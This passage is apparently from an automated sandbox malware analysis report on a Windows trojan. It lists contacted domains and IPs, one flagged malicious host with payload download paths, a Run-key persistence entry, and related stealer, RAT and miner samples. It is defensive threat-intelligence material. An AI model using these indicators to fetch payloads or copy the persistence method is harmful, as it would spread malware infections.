http://ipwho.is	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
dcs-public-edge-va6-158015560.us-east-1.elb.amazonaws.com	34.195.193.219	true	false	high
adobetarget.data.adobedc.net	63.140.39.82	true	false	unknown
part-0013.t-0009.t-msedge.net	13.107.213.41	true	false	unknown
ipwho.is	15.204.213.5	true	false	unknown
www.google.com	64.233.185.147	true	false	high
js.monitor.azure.com	unknown	unknown	false	high
microsoftmscompoc.tt.omtrdc.net	unknown	unknown	false	unknown
mdec.nelreports.net	unknown	unknown	false	unknown
mscom.demdex.net	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://js.monitor.azure.com/scripts/c/ms.jsll-3.min.js	false		high
185.196.10.233	true	Avira URL Cloud: safe	unknown
https://ipwho.is/	false	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cf	chromecache_146.9.dr	false		high
http://ipwho.isd	ilasm.exe, 00000019.00000002.3309899452.0000000007E19000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.gimp.org/xmp/	chromecache_145.9.dr	false		high
https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/	chromecache_146.9.dr	false		high
https://www.linkedin.com/cws/share?url=$	chromecache_136.9.dr	false		high
https://aka.ms/ContentUserFeedback	chromecache_146.9.dr	false		high
https://g.live.com/odclientsettings/ProdV2.C:	svchost.exe, 00000008.00000003.2187011411.000001E435600000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr	false		high
https://github.com/Youssef1313	chromecache_146.9.dr	false		high
https://aka.ms/banner_mslearn_tier1?wt.mc_id=build24_t1_learnpromotion_events	chromecache_136.9.dr	false		high
https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.yml	chromecache_146.9.dr	false		high
https://management.azure.com/subscriptions?api-version=2016-06-01	chromecache_136.9.dr	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid	KxgGGaiW3E.exe, 00000000.00000000.2054022360.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmp, KxgGGaiW3E.exe, 00000000.00000002.2119960535.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmp, KxgGGaiW3E.exe, 00000000.00000002.2117583475.000002B694BC1000.00000004.00001000.00020000.00000000.sdmp, KxgGGaiW3E.exe, 0000000D.00000002.2407170841.0000017BEE4E1000.00000004.00001000.00020000.00000000.sdmp, KxgGGaiW3E.exe, 0000000D.00000000.2257574944.00007FF703303000.00000008.00000001.01000000.00000008.sdmp, KxgGGaiW3E.exe, 0000000D.00000002.2413298334.00007FF703303000.00000008.00000001.01000000.00000008.sdmp, KxgGGaiW3E.exe, 00000013.00000000.2339412679.00007FF703303000.00000008.00000001.01000000.00000008.sdmp, KxgGGaiW3E.exe, 00000013.00000002.2435090839.0000020599121000.00000004.00001000.00020000.00000000.sdmp, KxgGGaiW3E.exe, 00000013.00000002.2441256177.00007FF703303000.00000008.00000001.01000000.00000008.sdmp	false		high
https://aka.ms/dotnet-warnings/	KxgGGaiW3E.exe, 00000000.00000000.2054022360.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmp, KxgGGaiW3E.exe, 00000000.00000002.2119960535.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmp, KxgGGaiW3E.exe, 00000000.00000002.2117583475.000002B694BC1000.00000004.00001000.00020000.00000000.sdmp, KxgGGaiW3E.exe, 0000000D.00000002.2407170841.0000017BEE4E1000.00000004.00001000.00020000.00000000.sdmp, KxgGGaiW3E.exe, 0000000D.00000000.2257574944.00007FF703303000.00000008.00000001.01000000.00000008.sdmp, KxgGGaiW3E.exe, 0000000D.00000002.2413298334.00007FF703303000.00000008.00000001.01000000.00000008.sdmp, KxgGGaiW3E.exe, 00000013.00000000.2339412679.00007FF703303000.00000008.00000001.01000000.00000008.sdmp, KxgGGaiW3E.exe, 00000013.00000002.2435090839.0000020599121000.00000004.00001000.00020000.00000000.sdmp, KxgGGaiW3E.exe, 00000013.00000002.2441256177.00007FF703303000.00000008.00000001.01000000.00000008.sdmp	false		high
https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.md	chromecache_146.9.dr	false		high
https://aka.ms/pshelpmechoose	chromecache_136.9.dr	false		high
https://stackoverflow.com/q/11564914/23354;	KxgGGaiW3E.exe, 00000000.00000002.2117583475.000002B695FC1000.00000004.00001000.00020000.00000000.sdmp, KxgGGaiW3E.exe, 00000000.00000002.2117583475.000002B6955C1000.00000004.00001000.00020000.00000000.sdmp, ngen.exe, 00000005.00000002.2184893054.0000000000402000.00000040.00000400.00020000.00000000.sdmp, KxgGGaiW3E.exe, 0000000D.00000002.2407170841.0000017BEF8E1000.00000004.00001000.00020000.00000000.sdmp, KxgGGaiW3E.exe, 0000000D.00000002.2407170841.0000017BEEEE1000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.3307610797.0000000000402000.00000040.00000400.00020000.00000000.sdmp, KxgGGaiW3E.exe, 00000013.00000002.2435090839.0000020599B21000.00000004.00001000.00020000.00000000.sdmp, KxgGGaiW3E.exe, 00000013.00000002.2435090839.000002059A521000.00000004.00001000.00020000.00000000.sdmp, wmplayer.exe, 0000001D.00000002.2488394877.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
https://aka.ms/feedback/report?space=61	chromecache_146.9.dr	false		high
https://ipwho.is	ilasm.exe, 00000019.00000002.3309899452.0000000007E07000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://twitter.com/intent/tweet?original_referer=$	chromecache_136.9.dr	false		high
https://github.com/gewarren	chromecache_146.9.dr	false		high
https://stackoverflow.com/q/2152978/23354sCannot	KxgGGaiW3E.exe, 00000000.00000002.2117583475.000002B695FC1000.00000004.00001000.00020000.00000000.sdmp, KxgGGaiW3E.exe, 00000000.00000002.2117583475.000002B6955C1000.00000004.00001000.00020000.00000000.sdmp, ngen.exe, 00000005.00000002.2184893054.0000000000402000.00000040.00000400.00020000.00000000.sdmp, KxgGGaiW3E.exe, 0000000D.00000002.2407170841.0000017BEF8E1000.00000004.00001000.00020000.00000000.sdmp, KxgGGaiW3E.exe, 0000000D.00000002.2407170841.0000017BEEEE1000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.3307610797.0000000000402000.00000040.00000400.00020000.00000000.sdmp, KxgGGaiW3E.exe, 00000013.00000002.2435090839.0000020599B21000.00000004.00001000.00020000.00000000.sdmp, KxgGGaiW3E.exe, 00000013.00000002.2435090839.000002059A521000.00000004.00001000.00020000.00000000.sdmp, wmplayer.exe, 0000001D.00000002.2488394877.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	KxgGGaiW3E.exe, 00000000.00000000.2054022360.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmp, KxgGGaiW3E.exe, 00000000.00000002.2119960535.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmp, KxgGGaiW3E.exe, 00000000.00000002.2117583475.000002B694BC1000.00000004.00001000.00020000.00000000.sdmp, KxgGGaiW3E.exe, 0000000D.00000002.2407170841.0000017BEE4E1000.00000004.00001000.00020000.00000000.sdmp, KxgGGaiW3E.exe, 0000000D.00000000.2257574944.00007FF703303000.00000008.00000001.01000000.00000008.sdmp, KxgGGaiW3E.exe, 0000000D.00000002.2413298334.00007FF703303000.00000008.00000001.01000000.00000008.sdmp, KxgGGaiW3E.exe, 00000013.00000000.2339412679.00007FF703303000.00000008.00000001.01000000.00000008.sdmp, KxgGGaiW3E.exe, 00000013.00000002.2435090839.0000020599121000.00000004.00001000.00020000.00000000.sdmp, KxgGGaiW3E.exe, 00000013.00000002.2441256177.00007FF703303000.00000008.00000001.01000000.00000008.sdmp, ilasm.exe, 00000019.00000002.3309899452.0000000007BD1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.linkedin.com/profile/add?startTask=CERTIFICATION_NAME&name=$	chromecache_136.9.dr	false		high
https://learn-video.azurefd.net/	chromecache_136.9.dr	false	Avira URL Cloud: safe	unknown
https://www.cafbaseline.com/	chromecache_136.9.dr	false	Avira URL Cloud: safe	unknown
https://api.ipify.org/	KxgGGaiW3E.exe, 00000000.00000002.2117583475.000002B695FC1000.00000004.00001000.00020000.00000000.sdmp, KxgGGaiW3E.exe, 00000000.00000002.2117583475.000002B6955C1000.00000004.00001000.00020000.00000000.sdmp, ngen.exe, 00000005.00000002.2184893054.0000000000402000.00000040.00000400.00020000.00000000.sdmp, KxgGGaiW3E.exe, 0000000D.00000002.2407170841.0000017BEF8E1000.00000004.00001000.00020000.00000000.sdmp, KxgGGaiW3E.exe, 0000000D.00000002.2407170841.0000017BEEEE1000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.3307610797.0000000000402000.00000040.00000400.00020000.00000000.sdmp, KxgGGaiW3E.exe, 00000013.00000002.2435090839.0000020599B21000.00000004.00001000.00020000.00000000.sdmp, KxgGGaiW3E.exe, 00000013.00000002.2435090839.000002059A521000.00000004.00001000.00020000.00000000.sdmp, wmplayer.exe, 0000001D.00000002.2488394877.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.md	chromecache_146.9.dr	false		high
https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725	chromecache_146.9.dr	false		high
https://stackoverflow.com/q/14436606/23354	KxgGGaiW3E.exe, 00000000.00000002.2117583475.000002B695FC1000.00000004.00001000.00020000.00000000.sdmp, KxgGGaiW3E.exe, 00000000.00000002.2117583475.000002B6955C1000.00000004.00001000.00020000.00000000.sdmp, ngen.exe, 00000005.00000002.2184893054.0000000000402000.00000040.00000400.00020000.00000000.sdmp, KxgGGaiW3E.exe, 0000000D.00000002.2407170841.0000017BEF8E1000.00000004.00001000.00020000.00000000.sdmp, KxgGGaiW3E.exe, 0000000D.00000002.2407170841.0000017BEEEE1000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.3307610797.0000000000402000.00000040.00000400.00020000.00000000.sdmp, KxgGGaiW3E.exe, 00000013.00000002.2435090839.0000020599B21000.00000004.00001000.00020000.00000000.sdmp, KxgGGaiW3E.exe, 00000013.00000002.2435090839.000002059A521000.00000004.00001000.00020000.00000000.sdmp, ilasm.exe, 00000019.00000002.3309899452.0000000007C57000.00000004.00000800.00020000.00000000.sdmp, wmplayer.exe, 0000001D.00000002.2488394877.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prev	chromecache_136.9.dr	false		high
https://github.com/Thraka	chromecache_146.9.dr	false		high
http://schemas.datacontract.org/2004/07/	ilasm.exe, 00000019.00000002.3309899452.0000000007E66000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/dotnet/docs/issues	chromecache_146.9.dr	false		high
https://aka.ms/certhelp	chromecache_136.9.dr	false		high
http://crl.ver)	svchost.exe, 00000008.00000002.3310972425.000001E435800000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://github.com/mairaw	chromecache_146.9.dr	false		high
https://aka.ms/yourcaliforniaprivacychoices	chromecache_146.9.dr	false		high
http://schemas.microst.	svchost.exe, 00000008.00000002.3311162257.000001E435859000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/nschonni	chromecache_146.9.dr	false		high
http://schemas.datacontract.org/2004/07/d	ilasm.exe, 00000019.00000002.3309899452.0000000007E66000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://g.live.com/odclientsettings/Prod/C:	svchost.exe, 00000008.00000003.2187011411.000001E435673000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr	false		high
https://github.com/adegeo	chromecache_146.9.dr	false		high
https://octokit.github.io/rest.js/#throttling	chromecache_136.9.dr	false	URL Reputation: safe	unknown
https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2017-0	chromecache_136.9.dr	false		high
https://github.com/$	chromecache_136.9.dr	false		high
http://schema.org/Organization	chromecache_146.9.dr	false		high
https://channel9.msdn.com/	chromecache_136.9.dr	false		high
http://ipwho.is	ilasm.exe, 00000019.00000002.3309899452.0000000007E19000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/dotnet/try	chromecache_136.9.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
13.107.213.41	part-0013.t-0009.t-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
63.140.39.35	unknown	United States	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
185.196.10.233	unknown	Switzerland	42624	SIMPLECARRIERCH	true
15.204.213.5	ipwho.is	United States	71	HP-INTERNET-ASUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
63.140.39.82	adobetarget.data.adobedc.net	United States	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
34.195.193.219	dcs-public-edge-va6-158015560.us-east-1.elb.amazonaws.com	United States	14618	AMAZON-AESUS	false
64.233.185.147	www.google.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.5
127.0.0.1

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1430591
Start date and time:	2024-04-23 23:01:11 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 2s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	36
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	KxgGGaiW3E.exe renamed because original name is a hash value
Original Sample Name:	eb0beafcb365cd20eb00ff9e19b73232.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@67/86@17/10
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
Excluded IPs from analysis (whitelisted): 172.217.215.94, 184.31.61.214, 142.250.9.100, 142.250.9.138, 142.250.9.113, 142.250.9.139, 142.250.9.101, 142.250.9.102, 64.233.176.84, 184.25.166.139, 34.104.35.123, 217.20.51.23, 192.229.211.108, 23.216.73.151, 142.251.15.95, 172.253.124.95, 173.194.219.95, 108.177.122.95, 64.233.177.95, 74.125.138.95, 74.125.136.95, 142.250.9.95, 64.233.176.95, 64.233.185.95, 142.250.105.95, 104.71.143.201, 104.71.143.219, 51.116.253.169, 20.110.205.119, 13.107.22.237, 131.253.33.237, 20.189.173.9, 184.31.62.93, 23.6.117.11, 23.6.117.25, 142.250.105.102, 142.250.105.100, 142.250.105.113, 142.250.105.138, 142.250.105.101, 142.250.105.139
Excluded domains from analysis (whitelisted): aijscdn2.afd.azureedge.net, onedscolprdwus08.westus.cloudapp.azure.com, onedscolprdgwc04.germanywestcentral.cloudapp.azure.com, slscr.update.microsoft.com, c-msn-com-nsatc.trafficmanager.net, clientservices.googleapis.com, browser.events.data.trafficmanager.net, learn.microsoft.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e11290.dspg.akamaiedge.net, mdec.nelreports.net.akamaized.net, go.microsoft.com, clients2.google.com, ocsp.digicert.com, e16604.g.akamaiedge.net, a1883.dscd.akamai.net, learn.microsoft.com.edgekey.net, dual-a-0034.dc-msedge.net, update.googleapis.com, prod.fs.microsoft.com.akadns.net, clients1.google.com, fs.microsoft.com, accounts.google.com, target.microsoft.com, content-autofill.googleapis.com, c-bing-com.dual-a-0034.a-msedge.net, ctldl.windowsupdate.com, learn.microsoft.com.edgekey.net.globalredir.akadns.net, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.co
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: KxgGGaiW3E.exe

Simulations

Behavior and APIs

Time	Type	Description
23:02:10	API Interceptor	61x Sleep call for process: powershell.exe modified
23:02:13	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run KxgGGaiW3E "C:\Users\user\KxgGGaiW3E.exe"
23:02:16	API Interceptor	2x Sleep call for process: svchost.exe modified
23:02:24	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run KxgGGaiW3E "C:\Users\user\KxgGGaiW3E.exe"

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
15.204.213.5	SecuriteInfo.com.Trojan.PWS.Siggen3.36229.12900.12961.exe	Get hash	malicious	Unknown	Browse	/?output=json
	SecuriteInfo.com.Trojan.PWS.Siggen3.36229.12900.12961.exe	Get hash	malicious	Unknown	Browse	/?output=json
	h8OaBL3UGd.exe	Get hash	malicious	Tuga Ransomware	Browse	ipwho.is/
	j2mnoMuBRh.exe	Get hash	malicious	Tuga Ransomware	Browse	ipwho.is/
	j2mnoMuBRh.exe	Get hash	malicious	Tuga Ransomware	Browse	ipwho.is/
	eeZJsTqr0S.exe	Get hash	malicious	PureLog Stealer, RedLine, zgRAT	Browse	ipwho.is/
	SecuriteInfo.com.FileRepMalware.9397.20651.exe	Get hash	malicious	Unknown	Browse	ipwhois.app/json/
	CbLQcrwzUi.exe	Get hash	malicious	Unknown	Browse	ipwhois.app/json/
	t6oXov842L.exe	Get hash	malicious	Agartha Clipper	Browse	ipwho.is/
	tkq7llTlQD	Get hash	malicious	Unknown	Browse	ipwho.is/
13.107.213.41	Quotation.xls	Get hash	malicious	Unknown	Browse	2s.gg/3zM
13.107.213.41	http://www.serviceadg.com	Get hash	malicious	Unknown	Browse	fr.linkedin.com/company/service-adg
63.140.39.35	https://librospy.com/	Get hash	malicious	Unknown	Browse
	https://jf3su0nc82kocw61.blob.core.windows.net/jf3su0nc82kocw61/1.html?4WNYDE6475pnqu82jukhgadbqc940IQTGHHCQEULWJIX13036XJPP12205G13#13/82-6475/940-13036-12205	Get hash	malicious	HTMLPhisher	Browse
	https://717d3e7431f2e7c7bb7dd22f0013e4b26da132b85882b1408b2497004a.pages.dev/	Get hash	malicious	HTMLPhisher	Browse
	https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:af39b5a2-dad8-480b-b876-bffaa9d66a9b	Get hash	malicious	HTMLPhisher	Browse
	CrucialUKScan(1).exe	Get hash	malicious	Unknown	Browse
	https://login.service-mediobanca.com/?rid=5spGrj3	Get hash	malicious	Unknown	Browse
	https://acrobat.adobe.com/id/urn:aaid:sc:EU:c6e86077-ef65-4d67-a1ae-540c15f32abd	Get hash	malicious	Unknown	Browse
	0ad633e2-921f-c631-3b46-d659c729bcb1.eml	Get hash	malicious	Unknown	Browse
	I4i6z8T1j9j8N5349890049902.zip	Get hash	malicious	Unknown	Browse
	https://mydhl-delivery.github.io/express/#rnpc.certidaopermanente@dgrn.mj.pt	Get hash	malicious	Unknown	Browse
185.196.10.233	23xCOZerXg.exe	Get hash	malicious	PureLog Stealer, Xmrig, zgRAT	Browse	185.196.10.233/dll/ghghghgfg.xml
	KPn7VgIWQj.exe	Get hash	malicious	PureLog Stealer, Xmrig, zgRAT	Browse	185.196.10.233/dll/ghghghgfg.xml
	SecuriteInfo.com.Trojan.PackedNET.2147.11643.5777.exe	Get hash	malicious	PureLog Stealer, Xmrig, zgRAT	Browse	185.196.10.233/dll/ghghghgfg.xml
	4KwjQMqbmm.exe	Get hash	malicious	PureLog Stealer, Xmrig, zgRAT	Browse	185.196.10.233/dll/ghghghgfg.xml
	U8fPEL1Gwi.exe	Get hash	malicious	PureLog Stealer, Xmrig, zgRAT	Browse	185.196.10.233/dll/ghghghgfg.xml
	govFLMmsZl.exe	Get hash	malicious	PureLog Stealer, Quasar, zgRAT	Browse	185.196.10.233/bestbuild.exe
	9NBx4Vmiuj.exe	Get hash	malicious	PureLog Stealer, XWorm, zgRAT	Browse	185.196.10.233/dggfsff.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
part-0013.t-0009.t-msedge.net	EXTERNAL Bonnie St Dryden is inviting you to collaborate on One_docx(Apr 23) DOC3848493.msg	Get hash	malicious	HTMLPhisher	Browse	13.107.213.41
	https://lithiuimvalley.com/ssd	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	13.107.213.41
	https://u44056869.ct.sendgrid.net/ls/click?upn=u001.nH1ryR-2Btr2av-2Bkfc8quLEXKlGRKFonctFf3nB-2FAP-2Bjae3IsQgCoKtK-2FQ57cEEmmhZzRyd07G16kQ6rsc4EaJT6S7Rh48kOVsBPHV-2Fkkk9Vfz7cojLOCLuj4sUGVMM7pbdmwtinmtiLhfYkhEkgve628OiJsccHyeYc3lkmkn6epsOmmj4-2Fi-2BWjxfm73m7vUzCOGnDWnQJBmmd6DmkDcfIw-3D-3DlLb9_7VBE-2BPKrWdDFE8TeQU0FNoYmRNt3BbsAfHCQfpyMVcUv91cWM1GbR6tMnpfVZqwoeCii1Z-2FHB6Wp4CGi-2FJ4Nq2flvhbRyRKwbWUqyssDslf87wBQZbBQ0EZsTXlvzjuj1ZnarL4QCJJlvUup-2FiM-2F9GPG6X3nhhKKp6sQ0v-2BBs5Jrrpzc3e5B2aUKKEJUx1Hjrx3xc16wmpK1HmM2sLiNIweMaJlJ9frDis7-2BK565mLw-3D	Get hash	malicious	HTMLPhisher	Browse	13.107.246.41
	https://www.jottacloud.com/s/359ee8b110b8ca8464998842a5d227ed979	Get hash	malicious	HTMLPhisher	Browse	13.107.213.41
	https://assets-usa.mkt.dynamics.com/6f8aa86c-81f8-ee11-a1fa-0022482e8338/digitalassets/standaloneforms/4b367e61-8601-ef11-a1fd-0022482f3701	Get hash	malicious	HTMLPhisher	Browse	13.107.246.41
	https://sunhos-my.sharepoint.com/:b:/g/personal/mcaffrey_suncrestcare_com/EVEm8VhV9TBDp7AQUrliImYB4Kt7rXcd_m6-8qNUjxBhTA?e=P3XNTL&xsdata=MDV8MDJ8cHJpY2hhcmRzb25AY2FsdG9uLmNvbXxkM2U5ZTc1MTlkNDA0NmI2OWMzODA4ZGM2M2JhOTA4Y3w3YjU1NzU2YTg5NTg0ZWNlODFkYzVkYTZhYmRiNmE5N3wwfDB8NjM4NDk0OTAwMTUyMzMwMjUxfFVua25vd258VFdGcGJHWnNiM2Q4ZXlKV0lqb2lNQzR3TGpBd01EQWlMQ0pRSWpvaVYybHVNeklpTENKQlRpSTZJazFoYVd3aUxDSlhWQ0k2TW4wPXwwfHx8&sdata=TldIbEg2OTJiSkRUS29RRElmU3dYbTBRQUlqUTBBMXZPcGlIaTlzNnlOQT0%3d	Get hash	malicious	HTMLPhisher	Browse	13.107.246.41
	23xCOZerXg.exe	Get hash	malicious	PureLog Stealer, Xmrig, zgRAT	Browse	13.107.246.41
	https://main-bvxea6i-qhygy63sspp2a.ca-1.platformsh.site/sample-page/	Get hash	malicious	HTMLPhisher	Browse	13.107.246.41
	https://www.msn.com/en-us/autos/enthusiasts/what-s-the-difference-between-a-shelby-mustang-and-a-regular-mustang/ar-AA1ntM5Z?ocid=entnewsntp&pc=U531&cvid=8b8aa9e3e14d4164a6a2181020104694&ei=36	Get hash	malicious	Unknown	Browse	13.107.246.41
	https://netorgft3546691-my.sharepoint.com/:b:/g/personal/nicole_felthaus_mmclippers_com/EfUF1hXkwfZNuGJhx43KV34BvAUaxh5xTDD3cQCuhCEK1w?e=yOS03G	Get hash	malicious	HTMLPhisher	Browse	13.107.246.41
ipwho.is	YZPS3Bfyza.exe	Get hash	malicious	Quasar	Browse	15.204.213.5
	YZPS3Bfyza.exe	Get hash	malicious	Quasar	Browse	15.204.213.5
	https://tom19-secondary.z15.web.core.windows.net/werrx01USAHTML/?bcda=+1-888-289-1419	Get hash	malicious	TechSupportScam	Browse	15.204.213.5
	https://ozluc01lyejozbbzmr.pages.dev/smart89/	Get hash	malicious	Unknown	Browse	15.204.213.5
	https://yzkgxjyz0y4417anol.pages.dev/smart89/	Get hash	malicious	Unknown	Browse	15.204.213.5
	https://new1256.z1.web.core.windows.net/	Get hash	malicious	Unknown	Browse	15.204.213.5
	fP4kybhBWi.exe	Get hash	malicious	Quasar	Browse	15.204.213.5
	https://bj8lt4fm8evwyl.pages.dev/smart89/	Get hash	malicious	Unknown	Browse	15.204.213.5
	https://jainpokliultachor.pages.dev/	Get hash	malicious	Unknown	Browse	15.204.213.5
	https://pusha1qsn.z13.web.core.windows.net/	Get hash	malicious	TechSupportScam	Browse	15.204.213.5
dcs-public-edge-va6-158015560.us-east-1.elb.amazonaws.com	_file____C__Users_hp_Downloads_C__Users_moodyt_AppData_Local_Temp_2_RemittanceAdvice17-Apr-2024.html	Get hash	malicious	Unknown	Browse	3.224.64.60
	Remittance. #U0440df.html	Get hash	malicious	HTMLPhisher	Browse	52.203.68.60
	23xCOZerXg.exe	Get hash	malicious	PureLog Stealer, Xmrig, zgRAT	Browse	54.209.244.119
	https://22apmic22.z13.web.core.windows.net/	Get hash	malicious	TechSupportScam	Browse	52.20.162.91
	https://in.xero.com/m/g4EjeZDud5lCeLiKvMaATTgixUJedYwIXI96osSo?utm_source=invoiceEmailViewInvoiceButton&utm_campaign=invoicesEmailStandardV2	Get hash	malicious	Unknown	Browse	44.198.199.61
	https://yxv.ens.mybluehost.me/Ca/net/login.php	Get hash	malicious	Unknown	Browse	3.81.240.237
	https://19apmic17.z13.web.core.windows.net/	Get hash	malicious	TechSupportScam	Browse	3.95.44.44
	https://19apmic11.z13.web.core.windows.net/	Get hash	malicious	TechSupportScam	Browse	34.206.173.201
	FFE Order details - Cincy v41720.xlsx	Get hash	malicious	Unknown	Browse	3.226.123.198
	FFE Order details - Cincy v41720.xlsx	Get hash	malicious	Unknown	Browse	54.225.90.78
adobetarget.data.adobedc.net	https://acrobat.adobe.com/id/urn:aaid:sc:AP:c47bd847-0028-43f6-8564-6c8445af0ecc	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	63.140.39.93
	23xCOZerXg.exe	Get hash	malicious	PureLog Stealer, Xmrig, zgRAT	Browse	63.140.39.82
	https://22apmic22.z13.web.core.windows.net/	Get hash	malicious	TechSupportScam	Browse	63.140.39.248
	https://in.xero.com/m/g4EjeZDud5lCeLiKvMaATTgixUJedYwIXI96osSo?utm_source=invoiceEmailViewInvoiceButton&utm_campaign=invoicesEmailStandardV2	Get hash	malicious	Unknown	Browse	63.140.38.55
	https://yxv.ens.mybluehost.me/Ca/net/login.php	Get hash	malicious	Unknown	Browse	63.140.38.111
	https://19apmic17.z13.web.core.windows.net/	Get hash	malicious	TechSupportScam	Browse	63.140.38.55
	https://19apmic11.z13.web.core.windows.net/	Get hash	malicious	TechSupportScam	Browse	63.140.38.189
	https://librospy.com/	Get hash	malicious	Unknown	Browse	63.140.39.35
	https://18apmic18.z13.web.core.windows.net/	Get hash	malicious	TechSupportScam	Browse	63.140.39.93
	https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:24e81d17-b801-4fad-ae25-120d655923c5	Get hash	malicious	Remcos	Browse	63.140.39.9

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CHINANET-BACKBONENo31Jin-rongStreetCN	https://acrobat.adobe.com/id/urn:aaid:sc:AP:c47bd847-0028-43f6-8564-6c8445af0ecc	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	63.140.39.93
	23xCOZerXg.exe	Get hash	malicious	PureLog Stealer, Xmrig, zgRAT	Browse	63.140.39.82
	oVOImRIAaz.elf	Get hash	malicious	Mirai	Browse	220.160.120.160
	NMdpQecbkg.elf	Get hash	malicious	Mirai	Browse	106.86.148.241
	1mHUcsxKG6.elf	Get hash	malicious	Mirai	Browse	171.113.147.175
	xzk9TKqNoI.elf	Get hash	malicious	Mirai	Browse	14.105.136.165
	sora.arm.elf	Get hash	malicious	Mirai	Browse	112.67.254.212
	sora.x86.elf	Get hash	malicious	Mirai	Browse	106.109.196.60
	sora.arm7.elf	Get hash	malicious	Mirai	Browse	42.251.164.112
	SecuriteInfo.com.Trojan.InstallCore.4086.15026.2213.exe	Get hash	malicious	PrivateLoader, PureLog Stealer	Browse	14.19.36.4
SIMPLECARRIERCH	23xCOZerXg.exe	Get hash	malicious	PureLog Stealer, Xmrig, zgRAT	Browse	185.196.10.233
	KPn7VgIWQj.exe	Get hash	malicious	PureLog Stealer, Xmrig, zgRAT	Browse	185.196.10.233
	YZPS3Bfyza.exe	Get hash	malicious	Quasar	Browse	185.196.10.233
	YZPS3Bfyza.exe	Get hash	malicious	Quasar	Browse	185.196.10.233
